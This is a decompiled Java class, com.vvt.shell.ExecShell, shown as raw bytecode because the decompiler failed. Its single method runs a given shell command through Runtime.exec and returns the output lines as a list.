package com.vvt.shell;

class ExecShell
{
  /* Error */
  public java.util.ArrayList a(ExecShell.SHELL_CMD paramSHELL_CMD)
  {
    // Byte code:
    //   0: new 10	java/util/ArrayList
    //   3: astore_2
    //   4: aload_2
    //   5: invokespecial 11	java/util/ArrayList:<init>	()V
    //   8: invokestatic 17	java/lang/Runtime:getRuntime	()Ljava/lang/Runtime;
    //   11: astore_3
    //   12: aload_1
    //   13: getfield 23	com/vvt/shell/ExecShell$SHELL_CMD:command	[Ljava/lang/String;
    //   16: astore 4
    //   18: aload_3
    //   19: aload 4
    //   21: invokevirtual 27	java/lang/Runtime:exec	([Ljava/lang/String;)Ljava/lang/Process;
    //   24: astore_3
    //   25: new 29	java/io/BufferedReader
    //   28: astore 4
    //   30: new 31	java/io/InputStreamReader
    //   33: astore 5
    //   35: aload_3
    //   36: invokevirtual 37	java/lang/Process:getInputStream	()Ljava/io/InputStream;
    //   39: astore 6
    //   41: aload 5
    //   43: aload 6
    //   45: invokespecial 40	java/io/InputStreamReader:<init>	(Ljava/io/InputStream;)V
    //   48: aload 4
    //   50: aload 5
    //   52: invokespecial 43	java/io/BufferedReader:<init>	(Ljava/io/Reader;)V
    //   55: aload 4
    //   57: invokevirtual 47	java/io/BufferedReader:readLine	()Ljava/lang/String;
    //   60: astore 5
    //   62: aload 5
    //   64: ifnull +25 -> 89
    //   67: aload_2
    //   68: aload 5
    //   70: invokevirtual 51	java/util/ArrayList:add	(Ljava/lang/Object;)Z
    //   73: pop
    //   74: goto -19 -> 55
    //   77: astore 4
    //   79: aload_3
    //   80: ifnull +7 -> 87
    //   83: aload_3
    //   84: invokevirtual 54	java/lang/Process:destroy	()V
    //   87: aload_2
    //   88: areturn
    //   89: aload 4
    //   91: invokevirtual 57	java/io/BufferedReader:close	()V
    //   94: aload_3
    //   95: ifnull -8 -> 87
    //   98: goto -15 -> 83
    //   101: astore_2
    //   102: aload_3
    //   103: ifnull +7 -> 110
    //   106: aload_3
    //   107: invokevirtual 54	java/lang/Process:destroy	()V
    //   110: aload_2
    //   111: athrow
    //   112: astore_3
    //   113: goto -26 -> 87
    // Local variable table:
    //   start	length	slot	name	signature
    //   0	116	0	this	ExecShell
    //   0	116	1	paramSHELL_CMD	ExecShell.SHELL_CMD
    //   3	85	2	localArrayList	java.util.ArrayList
    //   101	10	2	localObject1	Object
    //   11	96	3	localObject2	Object
    //   112	1	3	localException1	Exception
    //   16	40	4	localObject3	Object
    //   77	13	4	localException2	Exception
    //   33	36	5	localObject4	Object
    //   39	5	6	localInputStream	java.io.InputStream
    // Exception table:
    //   from	to	target	type
    //   55	60	77	java/lang/Exception
    //   68	74	77	java/lang/Exception
    //   89	94	77	java/lang/Exception
    //   55	60	101	finally
    //   68	74	101	finally
    //   89	94	101	finally
    //   8	11	112	java/lang/Exception
    //   12	16	112	java/lang/Exception
    //   19	24	112	java/lang/Exception
  }
}


/* Location:              /Volumes/D1/codebase/android/POC/assets/product/maind/classes-enjarify.jar!/com/vvt/shell/ExecShell.class
 * Java compiler version: 5 (49.0)
 * JD-Core Version:       0.7.1
 */